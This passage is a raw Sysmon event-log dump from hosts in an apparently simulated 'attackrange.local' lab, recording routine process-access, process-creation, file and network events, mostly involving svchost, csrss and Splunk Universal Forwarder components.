14:52:57.688{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049137Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:57.688{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049136Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:57.688{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049135Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:57.688{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049134Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:57.688{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049133Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:57.688{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049132Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:57.688{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049131Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:57.688{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049130Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:57.688{85C0FFC9-B7EC-607E-0500-00000000BB01}416532C:\Windows\system32\csrss.exe{85C0FFC9-EAC9-607E-CA06-00000000BB01}3440C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000049129Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:57.688{85C0FFC9-B85C-607E-9700-00000000BB01}30763836C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{85C0FFC9-EAC9-607E-CA06-00000000BB01}3440C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000049128Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:57.690{85C0FFC9-EAC9-607E-CA06-00000000BB01}3440C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{85C0FFC9-B7EC-607E-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{85C0FFC9-B85C-607E-9700-00000000BB01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000049127Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:57.673{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9A6CD8225769C363D2D892B92B5AEF0D,SHA256=B70FE7CAED4181F69820BF2389A27B35CDB94B3DC47EE97A1C44C6A11224E542,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000062768Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:57.910{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A16A825E5C03BC04296422AFA04F9BDA,SHA256=F43F26C403E7394C39D18660843D02B964EF4D9185D0197D8D9D23DB3B5BCFC5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049126Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:57.282{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A87BDEC107476EFDEFE79314DE064321,SHA256=BD1152DE5C12A8C461A454AFBC89024AB3082B7298B2B5A4FAE1145E839357E4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000049125Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:57.267{85C0FFC9-EAC9-607E-C906-00000000BB01}38602888C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{85C0FFC9-B85C-607E-9700-00000000BB01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000049124Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:54.965{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com58327-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 10341000x800000000000000049123Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:57.157{85C0FFC9-B85D-607E-9B00-00000000BB01}37722740C:\Windows\system32\conhost.exe{85C0FFC9-EAC9-607E-C906-00000000BB01}3860C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049122Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:57.157{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049121Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:57.157{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049120Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:57.157{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049119Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:57.157{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049118Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:57.157{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049117Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:57.157{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049116Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:57.157{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049115Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:57.157{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049114Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:57.157{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049113Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:57.157{85C0FFC9-B7EC-607E-0500-00000000BB01}416432C:\Windows\system32\csrss.exe{85C0FFC9-EAC9-607E-C906-00000000BB01}3860C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000049112Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:57.157{85C0FFC9-B85C-607E-9700-00000000BB01}30763836C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{85C0FFC9-EAC9-607E-C906-00000000BB01}3860C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000049111Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:57.158{85C0FFC9-EAC9-607E-C906-00000000BB01}3860C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program 